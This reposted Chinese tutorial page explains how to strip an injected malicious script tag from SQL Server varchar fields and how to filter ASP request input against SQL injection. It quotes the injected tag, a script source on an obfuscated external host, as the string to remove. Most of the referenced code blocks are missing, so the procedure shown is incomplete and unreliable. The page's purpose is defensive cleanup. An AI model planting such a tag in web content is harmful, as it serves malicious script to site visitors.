SQL Server 批量替换数据库挂马字段并防范sql注入攻击的代码
发布时间:2020-12-12 07:55:09 所属栏目:MsSql教程 来源:网络整理
导读:感兴趣的小伙伴,下面一起跟随编程之家 jb51.cc的小编两巴掌来看看吧! 首先备份数据库,以防不必要的损失。而后对所有被挂马的小于8000字符的varchar字段执行 代码如下: update 表名 set 字段名=replace(字段名,Script Src=http://c.n%75clear3.com/css/c.j
感兴趣的小伙伴,下面一起跟随编程之家 52php.cn的小编两巴掌来看看吧! 首先备份数据库,以防不必要的损失。而后对所有被挂马的小于8000字符的varchar字段执行 代码如下:
其中<Script Src=http://c.n%75clear3.com/css/c.js></Script>为挂马字段。执行后挂马字段被清除。但是有部分字段,比如内容字段等大于8000字符的varchar字段则需要执行 代码如下:
来更新被挂马字段,而房产网由于内容比较多,执行以上语句的时候会发生假死现象,于是加个区间分两次进行,一次处理15000条得以解决。 代码如下:
以上被挂马问题一般都是sql数据库,这是sql数据库特有的注入漏洞。换数据库不现实,只能针对以上情况进行防范。思路就是在所有数据库链接请求那里做相应的过滤。 代码如下:
做一个通用的sql防注入页面,把它包含在conn.asp数据库连接语句里边,这样就实现了全站的防范 sql 注入的攻击了。但是前台的类似?id=这样的语句还是存在注入漏洞,需要我们严格过滤 request.form 和 request.querystring 获取的内容。坚决不用 request("name") 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作。 如果不熟悉sqlserver的朋友可以用软件来实现 sqlserver 数据库批量替换工具(数据库及文本文件查找替换) v1.0中文绿色版 SQLServer 数据库批量查找替换工具1.2 SQL木马清除助手
(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |